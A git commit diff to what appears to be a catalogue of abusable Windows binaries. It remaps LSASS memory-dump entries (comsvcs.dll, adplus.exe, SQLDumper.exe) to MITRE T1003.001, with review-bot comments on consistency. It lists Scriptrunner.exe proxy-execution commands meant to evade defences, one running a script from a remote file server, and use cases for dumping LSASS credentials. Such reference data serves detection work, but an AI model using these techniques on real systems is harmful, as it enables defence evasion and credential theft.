LSASS realign to T1003.001

Wietze 2021-11-05 20:35:58 +00:00
parent df8c88f4ca
commit 2380c506d4
No known key found for this signature in database
GPG Key ID: E17630129FF993CF
4 changed files with 5 additions and 5 deletions

View File

@ -6,14 +6,14 @@ Created: 2018-05-25
Commands:
- Command: Scriptrunner.exe -appvscript calc.exe
Description: Executes calc.exe
Usecase: Execute binary through proxy binary to evade defensive counter measurments
Usecase: Execute binary through proxy binary to evade defensive counter measures
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
Description: Executes calc.cmd from remote server
Usecase: Execute binary through proxy binary from external server to evade defensive counter measurments
Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
Category: Execute
Privileges: User
MitreID: T1218
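Review bot: the two typo fixes in this hunk (counter measurments -> counter measures) are unrelated to the commit message "LSASS realign to T1003.001" and would be easier to trace in their own commit, or at least mentioned in the message. While touching this file, note that the two Scriptrunner.exe commands describe the same proxy-execution use case but carry different MitreIDs (T1202 on the first entry, T1218 on the second); the two entries should be aligned so the technique mapping is consistent. Minor: "Windows vista" should be "Windows Vista" in the OperatingSystem line.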

View File

@ -9,7 +9,7 @@ Commands:
Usecase: Dump Lsass.exe process memory to retrieve credentials.
Category: Dump
Privileges: SYSTEM
MitreID: T1003
MitreID: T1003.001
OperatingSystem: Windows
Full_Path:
- Path: c:\windows\system32\comsvcs.dll
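Review bot: the realignment from T1003 to the T1003.001 sub-technique matches the Usecase ("Dump Lsass.exe process memory to retrieve credentials") in this hunk, so the change itself is correct. Style: "Lsass.exe" here differs from "LSASS.exe" used in the other entries touched by this commit, and the OperatingSystem value "Windows" differs from "All Windows" in the adplus entry; consider harmonising both so the YAML entries for the same technique read consistently.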

View File

@ -9,7 +9,7 @@ Commands:
Usecase: Create memory dump and parse it offline
Category: Dump
Privileges: SYSTEM
MitreID: T1003
MitreID: T1003.001
OperatingSystem: All Windows
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
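Review bot: the Usecase in this hunk ("Create memory dump and parse it offline") does not name the target process, so a reader cannot tell from the entry alone why it now maps to T1003.001 (LSASS Memory) rather than the parent T1003. Suggest making the Usecase explicit about the dump target, in line with the comsvcs and SQLDumper entries in this commit, so the sub-technique mapping is self-evident from the description.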

View File

@ -16,7 +16,7 @@ Commands:
Usecase: Dump LSASS.exe to Mimikatz compatible dump using PID.
Category: Dump
Privileges: Administrator
MitreID: T1003
MitreID: T1003.001
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
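Review bot: this entry lists "Privileges: Administrator" while the comsvcs.dll and adplus.exe entries realigned in the same commit list "Privileges: SYSTEM" for the same LSASS dump use case. If the difference is intentional, it is worth a short justification in the commit message; otherwise the three entries should state the same privilege level so consumers of the YAML are not misled about the required context. The T1003.001 mapping itself is consistent with the Usecase ("Dump LSASS.exe to Mimikatz compatible dump using PID").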